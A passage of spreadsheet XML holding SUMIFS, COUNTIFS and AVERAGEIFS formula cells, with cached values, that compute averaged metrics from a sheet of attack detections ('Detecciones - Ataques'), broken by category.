        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.1802618328</v>
      </c>
      <c r="U133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.698433584</v>
      </c>
      <c r="V133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.5833333333</v>
      </c>
      <c r="W133" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>2014.714286</v>
      </c>
      <c r="Y133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0.4666666667</v>
      </c>
      <c r="Z133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>879.5112081</v>
      </c>
      <c r="AA133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.9615384615</v>
      </c>
      <c r="AB133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>1.697916667</v>
      </c>
      <c r="AC133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>2.5</v>
      </c>
      <c r="AD133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.5400103073</v>
      </c>
      <c r="AE133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.9</v>
      </c>
      <c r="AF133" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.7727272727</v>
      </c>
      <c r="AG133" s="271"/>
      <c r="AH133" s="352" t="s">
        <v>2552</v>
      </c>
      <c r="AI133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.07693488388</v>
      </c>
      <c r="AJ133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>2.5</v>
      </c>
      <c r="AL133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.1802618328</v>
      </c>
      <c r="AN133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.3635338346</v>
      </c>
      <c r="AR133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AS133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>1</v>
      </c>
      <c r="AU133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>1.5</v>
      </c>
      <c r="AV133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1.333333333</v>
      </c>
      <c r="AW133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>1.333333333</v>
      </c>
      <c r="AY133" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BA133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB133" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>4701</v>
      </c>
      <c r="BD133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>1</v>
      </c>
      <c r="BI133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>1</v>
      </c>
      <c r="BM133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>1421.959349</v>
      </c>
      <c r="BN133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>311.2649333</v>
      </c>
      <c r="BO133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>2</v>
      </c>
      <c r="BT133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>4</v>
      </c>
      <c r="BX133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BZ133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="CA133" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC133" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>2</v>
      </c>
      <c r="CG133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>6</v>
      </c>
      <c r="CL133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>2.625</v>
      </c>
      <c r="CN133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.75</v>
      </c>
      <c r="CP133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>9</v>
      </c>
      <c r="CQ133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>2</v>
      </c>
      <c r="CR133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.3460337524</v>
      </c>
      <c r="CT133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.007984031936</v>
      </c>
      <c r="CU133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>2</v>
      </c>
      <c r="CY133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH133" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="DI133" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ133" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DB$3:$DB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.090909091</v>
      </c>
      <c r="DK133" s="271"/>
    </row>
    <row r="134">
      <c r="J134" s="277"/>
      <c r="K134" s="512"/>
      <c r="L134" s="512"/>
      <c r="M134" s="512"/>
      <c r="N134" s="512"/>
      <c r="O134" s="278"/>
      <c r="Q134" s="271"/>
      <c r="R134" s="352" t="s">
        <v>2553</v>
      </c>
      <c r="S134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.5386301229</v>
      </c>
      <c r="T134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.1802618328</v>
      </c>
      <c r="U134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.898433584</v>
      </c>
      <c r="V134" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$ER$3:$ER$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
